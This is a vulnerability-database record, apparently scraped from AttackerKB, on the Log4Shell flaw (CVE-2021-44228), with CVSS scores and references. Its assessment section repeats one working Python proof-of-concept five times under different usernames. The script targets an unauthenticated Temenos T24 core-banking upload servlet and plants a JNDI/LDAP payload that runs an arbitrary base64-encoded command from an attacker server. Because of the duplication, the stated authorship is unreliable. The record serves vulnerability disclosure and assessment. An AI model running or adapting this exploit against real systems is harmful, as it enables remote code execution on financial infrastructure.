{"id": "AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44228 (Log4Shell)", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\n \n**Recent assessments:** \n \n**blobla01** at December 21, 2021 1:23am UTC reported:\n\nThe vulnerabilities exists in Temenos T24, widely used in core-banking, \nThere\u2019re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it\u2019s accessible without any authentication:\n \n \n package com.temenos.t24browser.servlets;\n \n public class FileUploadServlet extends HttpServlet {\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);\n //truncated\n if (paramName.equalsIgnoreCase(\"uploadType\")) {\n innerObj.setUploadType(paramValue);\n innerObj.setUploadTypeInfoFromT24(); <=\n //truncated\n \n\nThe uploadType is passed from user input, then passed to the innerObj \nContent of innerObj.setUploadTypeInfoFromT24():\n \n \n private void setUploadTypeInfoFromT24() {\n try {\n String responseXml = FileUploadServlet.this.sendUtilityRequest(\"OS.GET.UPLOAD.TYPE.INFO\", this.uploadType, this.request);\n String uploadTypeInfo = Utils.getNodeFromString(responseXml, \"uploadTypeInfo\");\n if (FileUploadServlet.LOGGER.isDebugEnabled()) {\n FileUploadServlet.LOGGER.debug(\"File upload: uploadTypeInfo=\" + uploadTypeInfo);\n }\n \n if (!uploadTypeInfo.contains(\"<maxFileSize>\")) {\n throw new IllegalArgumentException(\"EB-FILE.UPLOAD.TYPE.NOT.FOUND|\" + this.uploadType + \"|\"); <=\n }\n }\n \n\nAs you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(), \nPoC script:\n \n \n import requests\n import base64\n import sys\n \n \n target = sys.argv[1]\n cmd = base64.b64encode(sys.argv[2])\n print(\"Attacking \" + target)\n print(\"Cmd: \"+ sys.argv[2])\n ldap_url = \"ldap://<server>:2389/Deserialization/ROME/command/base64/\"+cmd\n \n \n burp0_url = target + \"/BrowserWeb/servlet/BrowserServlet\"\n burp0_headers = {\"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": target + \"/BrowserWeb/\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n ct = requests.get(burp0_url, headers=burp0_headers, verify=False)\n token = ct.cookies.get('JSESSIONID')\n \n burp0_url = target + \"/BrowserWeb/servlet/FileUploadServlet\"\n burp0_cookies = {\"JSESSIONID\": token}\n burp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG\", \"User-Agent\": \"Mozilla/5.0\", \"Connection\": \"close\"}\n burp0_data = \"------WebKitFormBoundarygrfK28lThpyA12GG\\r\\nContent-Disposition: form-data; name=\\\"uploadType\\\"\\r\\n\\r\\n${jndi:\"+ldap_url+\"}\\r\\n\\r\\n------WebKitFormBoundarygrfK28lThpyA12GG--\\r\\n\"\n requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)\n \n \n\n**AmirFedida** at December 12, 2021 8:47am UTC reported:\n\nThe vulnerabilities exists in Temenos T24, widely used in core-banking, \nThere\u2019re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it\u2019s accessible without any authentication:\n \n \n package com.temenos.t24browser.servlets;\n \n public class FileUploadServlet extends HttpServlet {\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);\n //truncated\n if (paramName.equalsIgnoreCase(\"uploadType\")) {\n innerObj.setUploadType(paramValue);\n innerObj.setUploadTypeInfoFromT24(); <=\n //truncated\n \n\nThe uploadType is passed from user input, then passed to the innerObj \nContent of innerObj.setUploadTypeInfoFromT24():\n \n \n private void setUploadTypeInfoFromT24() {\n try {\n String responseXml = FileUploadServlet.this.sendUtilityRequest(\"OS.GET.UPLOAD.TYPE.INFO\", this.uploadType, this.request);\n String uploadTypeInfo = Utils.getNodeFromString(responseXml, \"uploadTypeInfo\");\n if (FileUploadServlet.LOGGER.isDebugEnabled()) {\n FileUploadServlet.LOGGER.debug(\"File upload: uploadTypeInfo=\" + uploadTypeInfo);\n }\n \n if (!uploadTypeInfo.contains(\"<maxFileSize>\")) {\n throw new IllegalArgumentException(\"EB-FILE.UPLOAD.TYPE.NOT.FOUND|\" + this.uploadType + \"|\"); <=\n }\n }\n \n\nAs you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(), \nPoC script:\n \n \n import requests\n import base64\n import sys\n \n \n target = sys.argv[1]\n cmd = base64.b64encode(sys.argv[2])\n print(\"Attacking \" + target)\n print(\"Cmd: \"+ sys.argv[2])\n ldap_url = \"ldap://<server>:2389/Deserialization/ROME/command/base64/\"+cmd\n \n \n burp0_url = target + \"/BrowserWeb/servlet/BrowserServlet\"\n burp0_headers = {\"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": target + \"/BrowserWeb/\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n ct = requests.get(burp0_url, headers=burp0_headers, verify=False)\n token = ct.cookies.get('JSESSIONID')\n \n burp0_url = target + \"/BrowserWeb/servlet/FileUploadServlet\"\n burp0_cookies = {\"JSESSIONID\": token}\n burp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG\", \"User-Agent\": \"Mozilla/5.0\", \"Connection\": \"close\"}\n burp0_data = \"------WebKitFormBoundarygrfK28lThpyA12GG\\r\\nContent-Disposition: form-data; name=\\\"uploadType\\\"\\r\\n\\r\\n${jndi:\"+ldap_url+\"}\\r\\n\\r\\n------WebKitFormBoundarygrfK28lThpyA12GG--\\r\\n\"\n requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)\n \n \n\n**nu11secur1ty** at December 19, 2021 9:49am UTC reported:\n\nThe vulnerabilities exists in Temenos T24, widely used in core-banking, \nThere\u2019re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it\u2019s accessible without any authentication:\n \n \n package com.temenos.t24browser.servlets;\n \n public class FileUploadServlet extends HttpServlet {\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);\n //truncated\n if (paramName.equalsIgnoreCase(\"uploadType\")) {\n innerObj.setUploadType(paramValue);\n innerObj.setUploadTypeInfoFromT24(); <=\n //truncated\n \n\nThe uploadType is passed from user input, then passed to the innerObj \nContent of innerObj.setUploadTypeInfoFromT24():\n \n \n private void setUploadTypeInfoFromT24() {\n try {\n String responseXml = FileUploadServlet.this.sendUtilityRequest(\"OS.GET.UPLOAD.TYPE.INFO\", this.uploadType, this.request);\n String uploadTypeInfo = Utils.getNodeFromString(responseXml, \"uploadTypeInfo\");\n if (FileUploadServlet.LOGGER.isDebugEnabled()) {\n FileUploadServlet.LOGGER.debug(\"File upload: uploadTypeInfo=\" + uploadTypeInfo);\n }\n \n if (!uploadTypeInfo.contains(\"<maxFileSize>\")) {\n throw new IllegalArgumentException(\"EB-FILE.UPLOAD.TYPE.NOT.FOUND|\" + this.uploadType + \"|\"); <=\n }\n }\n \n\nAs you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(), \nPoC script:\n \n \n import requests\n import base64\n import sys\n \n \n target = sys.argv[1]\n cmd = base64.b64encode(sys.argv[2])\n print(\"Attacking \" + target)\n print(\"Cmd: \"+ sys.argv[2])\n ldap_url = \"ldap://<server>:2389/Deserialization/ROME/command/base64/\"+cmd\n \n \n burp0_url = target + \"/BrowserWeb/servlet/BrowserServlet\"\n burp0_headers = {\"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": target + \"/BrowserWeb/\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n ct = requests.get(burp0_url, headers=burp0_headers, verify=False)\n token = ct.cookies.get('JSESSIONID')\n \n burp0_url = target + \"/BrowserWeb/servlet/FileUploadServlet\"\n burp0_cookies = {\"JSESSIONID\": token}\n burp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG\", \"User-Agent\": \"Mozilla/5.0\", \"Connection\": \"close\"}\n burp0_data = \"------WebKitFormBoundarygrfK28lThpyA12GG\\r\\nContent-Disposition: form-data; name=\\\"uploadType\\\"\\r\\n\\r\\n${jndi:\"+ldap_url+\"}\\r\\n\\r\\n------WebKitFormBoundarygrfK28lThpyA12GG--\\r\\n\"\n requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)\n \n \n\n**ccondon-r7** at December 10, 2021 6:39pm UTC reported:\n\nThe vulnerabilities exists in Temenos T24, widely used in core-banking, \nThere\u2019re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it\u2019s accessible without any authentication:\n \n \n package com.temenos.t24browser.servlets;\n \n public class FileUploadServlet extends HttpServlet {\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);\n //truncated\n if (paramName.equalsIgnoreCase(\"uploadType\")) {\n innerObj.setUploadType(paramValue);\n innerObj.setUploadTypeInfoFromT24(); <=\n //truncated\n \n\nThe uploadType is passed from user input, then passed to the innerObj \nContent of innerObj.setUploadTypeInfoFromT24():\n \n \n private void setUploadTypeInfoFromT24() {\n try {\n String responseXml = FileUploadServlet.this.sendUtilityRequest(\"OS.GET.UPLOAD.TYPE.INFO\", this.uploadType, this.request);\n String uploadTypeInfo = Utils.getNodeFromString(responseXml, \"uploadTypeInfo\");\n if (FileUploadServlet.LOGGER.isDebugEnabled()) {\n FileUploadServlet.LOGGER.debug(\"File upload: uploadTypeInfo=\" + uploadTypeInfo);\n }\n \n if (!uploadTypeInfo.contains(\"<maxFileSize>\")) {\n throw new IllegalArgumentException(\"EB-FILE.UPLOAD.TYPE.NOT.FOUND|\" + this.uploadType + \"|\"); <=\n }\n }\n \n\nAs you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(), \nPoC script:\n \n \n import requests\n import base64\n import sys\n \n \n target = sys.argv[1]\n cmd = base64.b64encode(sys.argv[2])\n print(\"Attacking \" + target)\n print(\"Cmd: \"+ sys.argv[2])\n ldap_url = \"ldap://<server>:2389/Deserialization/ROME/command/base64/\"+cmd\n \n \n burp0_url = target + \"/BrowserWeb/servlet/BrowserServlet\"\n burp0_headers = {\"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": target + \"/BrowserWeb/\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n ct = requests.get(burp0_url, headers=burp0_headers, verify=False)\n token = ct.cookies.get('JSESSIONID')\n \n burp0_url = target + \"/BrowserWeb/servlet/FileUploadServlet\"\n burp0_cookies = {\"JSESSIONID\": token}\n burp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG\", \"User-Agent\": \"Mozilla/5.0\", \"Connection\": \"close\"}\n burp0_data = \"------WebKitFormBoundarygrfK28lThpyA12GG\\r\\nContent-Disposition: form-data; name=\\\"uploadType\\\"\\r\\n\\r\\n${jndi:\"+ldap_url+\"}\\r\\n\\r\\n------WebKitFormBoundarygrfK28lThpyA12GG--\\r\\n\"\n requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)\n \n \n\n**RhinosF1** at December 10, 2021 10:48pm UTC reported:\n\nThe vulnerabilities exists in Temenos T24, widely used in core-banking, \nThere\u2019re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it\u2019s accessible without any authentication:\n \n \n package com.temenos.t24browser.servlets;\n \n public class FileUploadServlet extends HttpServlet {\n public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);\n //truncated\n if (paramName.equalsIgnoreCase(\"uploadType\")) {\n innerObj.setUploadType(paramValue);\n innerObj.setUploadTypeInfoFromT24(); <=\n //truncated\n \n\nThe uploadType is passed from user input, then passed to the innerObj \nContent of innerObj.setUploadTypeInfoFromT24():\n \n \n private void setUploadTypeInfoFromT24() {\n try {\n String responseXml = FileUploadServlet.this.sendUtilityRequest(\"OS.GET.UPLOAD.TYPE.INFO\", this.uploadType, this.request);\n String uploadTypeInfo = Utils.getNodeFromString(responseXml, \"uploadTypeInfo\");\n if (FileUploadServlet.LOGGER.isDebugEnabled()) {\n FileUploadServlet.LOGGER.debug(\"File upload: uploadTypeInfo=\" + uploadTypeInfo);\n }\n \n if (!uploadTypeInfo.contains(\"<maxFileSize>\")) {\n throw new IllegalArgumentException(\"EB-FILE.UPLOAD.TYPE.NOT.FOUND|\" + this.uploadType + \"|\"); <=\n }\n }\n \n\nAs you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(), \nPoC script:\n \n \n import requests\n import base64\n import sys\n \n \n target = sys.argv[1]\n cmd = base64.b64encode(sys.argv[2])\n print(\"Attacking \" + target)\n print(\"Cmd: \"+ sys.argv[2])\n ldap_url = \"ldap://<server>:2389/Deserialization/ROME/command/base64/\"+cmd\n \n \n burp0_url = target + \"/BrowserWeb/servlet/BrowserServlet\"\n burp0_headers = {\"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": target + \"/BrowserWeb/\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n ct = requests.get(burp0_url, headers=burp0_headers, verify=False)\n token = ct.cookies.get('JSESSIONID')\n \n burp0_url = target + \"/BrowserWeb/servlet/FileUploadServlet\"\n burp0_cookies = {\"JSESSIONID\": token}\n burp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG\", \"User-Agent\": \"Mozilla/5.0\", \"Connection\": \"close\"}\n burp0_data = \"------WebKitFormBoundarygrfK28lThpyA12GG\\r\\nContent-Disposition: form-data; name=\\\"uploadType\\\"\\r\\n\\r\\n${jndi:\"+ldap_url+\"}\\r\\n\\r\\n------WebKitFormBoundarygrfK28lThpyA12GG--\\r\\n\"\n requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)\n \n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2022-02-08T00:00:00", "modified": "2022-02-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228", "https://logging.apache.org/log4j/2.x/security.html", "http://www.openwall.com/lists/oss-security/2021/12/10/1", "http://www.openwall.com/lists/oss-security/2021/12/10/2", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "http://www.openwall.com/lists/oss-security/2021/12/10/3", "https://security.netapp.com/advisory/ntap-20211210-0007/", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html", "https://www.debian.org/security/2021/dsa-5020", "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/", "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "http://www.openwall.com/lists/oss-security/2021/12/13/2", "http://www.openwall.com/lists/oss-security/2021/12/13/1", "http://www.openwall.com/lists/oss-security/2021/12/14/4", "https://www.kb.cert.org/vuls/id/930724", "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf", "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html", "http://www.openwall.com/lists/oss-security/2021/12/15/3", "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/", "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf", "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", "https://support.apple.com/kb/HT213189", "http://seclists.org/fulldisclosure/2022/Mar/23", "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "https://twitter.com/kurtseifried/status/1469345530182455296", "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html", "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html", "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html", "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html", "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html", "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html", "https://www.oracle.com/security-alerts/cpujan2022.html", "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html", "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md", "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001", "https://github.com/cisagov/log4j-affected-db", "https://www.oracle.com/security-alerts/cpuapr2022.html", "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228", "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"], "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "immutableFields": [], "lastseen": "2022-05-05T23:37:46", "viewCount": 123, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "almalinux", "idList": ["ALSA-2022:0290"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1562", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "attackerkb", "idList": ["AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "centos", "idList": ["CESA-2021:5206"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cloudlinux", "idList": ["CLSA-2022:1642429400"]}, {"type": "cve", "idList": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-23302", "CVE-2022-23848"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DLA-2905-1:3AD13", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2022-23302"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K59563964"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "B0F49CB9-6736-11EC-9EEA-589CFC007716"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-3W6P-8F82-GW8R", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GHSA-W9P3-5CR8-M3JJ", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C734DE8-002A-5611-8897-213D53D85089", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", 